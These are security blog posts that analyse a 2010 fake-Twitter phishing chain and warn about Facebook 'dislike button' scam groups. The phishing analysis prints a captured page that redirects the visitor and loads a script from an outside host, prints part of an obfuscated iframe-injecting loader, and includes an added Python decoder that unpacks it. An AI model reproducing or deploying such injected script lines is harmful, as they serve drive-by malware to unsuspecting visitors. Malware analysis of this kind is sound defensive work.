Interesting New Twitter Phish Can Lead to Bad Places

I’ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn’t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting just my friends and me, which is totally possible. 🙂 Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular email could have done more damage if it wasn’t for some crappy attacker code.  Read on!

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phishy-looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<META HTTP-EQUIV="refresh" CONTENT="0;URL=hxxp://software-oemdigital.ru">

</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/[‘ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) shows that the script tries to load several things, including some VBScript that seems to check for system properties, whether you are running Firefox, and whether you have Java and/or Flash enabled, as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.
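The substitution scheme visible in cxx() can be reversed statically, without running the attacker's script. The following is an added example, not code from the original post or from jsunpack; it assumes that fUp (not shown on the page) is the string "%", that the marker characters are o, w, : and Y as read from cxx()'s character class, and that the script then URL-unescapes the result. The input is the truncated fragment shown above.

```python
import re
from urllib.parse import unquote

# Fragment copied from the response body above; the post truncates it at <SNIP>.
SAMPLE = (
    "d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62s"
    "o6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3e"
    "w22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d"
    ":65w20srcw3do5co22httw70Y3ao2f"
)

# Assumption: these are the characters cxx() swaps for "%" (fUp is not shown).
MARKERS = "ow:Y"


def decode(blob, markers=MARKERS):
    """Undo the marker substitution as plain string work; nothing is executed."""
    # Step 1 mirrors cxx(): drop any literal "%" already in the blob.
    stripped = blob.replace("%", "")
    # Step 2: every marker character stands in for "%", giving %xx escapes.
    percent = re.sub("[" + re.escape(markers) + "]", "%", stripped)
    # Step 3 (assumed): URL-unescape, byte-for-byte like JavaScript's unescape().
    return unquote(percent, encoding="latin-1")


def triage(decoded):
    """Flag the traits an analyst looks for in a decoded drive-by loader."""
    checks = [
        ("document.write", r"document\.write\s*\("),
        ("iframe", r"<iframe\b"),
        # Content pushed far off-screen so the victim never sees it.
        ("offscreen-position", r"(?:left|top)\s*:\s*-\d{3,}px"),
    ]
    return [name for name, pat in checks if re.search(pat, decoded, re.I)]


if __name__ == "__main__":
    text = decode(SAMPLE)
    print(text)
    print(triage(text))
```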

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://, it 404’s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:


This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and try to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.

Beware of Evil Facebook Groups

Some of my Facebook friends are probably wondering why I would fall into the trap of the magical “dislike button” hype that seems to be sweeping across Facebook right now.  In a little social experiment and hopefully an awareness exercise for some of my non-security friends I created a Facebook group based off of similar ones I have seen called The REAL Dislike Button™ is Finally Here! Add it Now!.  The group is harmless even if it looks like there is scary JavaScript code in the instructions to “turn your friends blue”.  If you click on the link it takes you to one of my favorite YouTube videos.  🙂

The point is that these fake groups are targeting Facebook users thinking that Facebook has these new “features” like a dislike button and even ones like “see who viewed your profile”.  Folks, these techniques and/or modifications to Facebook don’t exist.  Sorry.  Just in the last week I have seen more and more of my Facebook friends sharing links to these groups.  Almost all of the groups I have looked at that were being shared lead to very bad places which I will demonstrate below.

Example #1 – The Typical “Get the DISLIKE BUTTON” Scam
In this example we have one of *many* groups that promise you the uber magic secret “dislike” button if you just join the group, invite your friends to do the same and follow some strange link off to Neverland.  This group has 1,162,238 members.  I wish I was making that number up.

The first thing you will notice is that there is a link to a Facebook profile they want you to friend.  That profile was deleted (your first clue).  Next, they want you to check out a link in Step 5.  That link sends you here:

Which will eventually install some nasty adware/spyware on your Windows machine called Adware.Mywebsearch.DV.  It’s not easy to get rid of.

In a similar group like the one above with a mere 697,375 members the last link takes you to this:

If you go through with entering in your cell phone number and getting the confirmation code per the instructions you have just signed up for a monthly charge to your cell phone account to the tune of $9.99 per month.  The monthly charge details are in the very tiny text you can hardly read.  Nice.  But wait, if you were smart enough to try and close the quiz window, you get this pop-up:

Really?  Hopefully you don’t fall for that one even though it shows your real city.

Example #2 – The Typical “See everyone who viewed your profile” Scam

This is one of my favorites as this is another impossible feat of Facebook technology.  Here is what the screen shot looks like:

Note the PhotoShop job on the notification window showing who has “viewed” your profile.  Clicking on the bit.ly link leads you to another quiz application or adware/spyware or other forms of dangerous malware.  Don’t worry, there are *lots* of these groups out there. Good times.

So the lesson here is…don’t click on anything in these groups that tempt you with magical Facebook powers!  If it seems too good to be true, it probably is!

Social Zombies: Your Friends Want To Eat Your Brains Video from DEFCON Posted

The video from the talk Kevin Johnson and I did at DEFCON 17 called “Social Zombies: Your Friends Want To Eat Your Brains” is now up on Vimeo.  If you missed us at DEFCON, Kevin and I will be presenting an updated version at OWASP AppSec DC in November.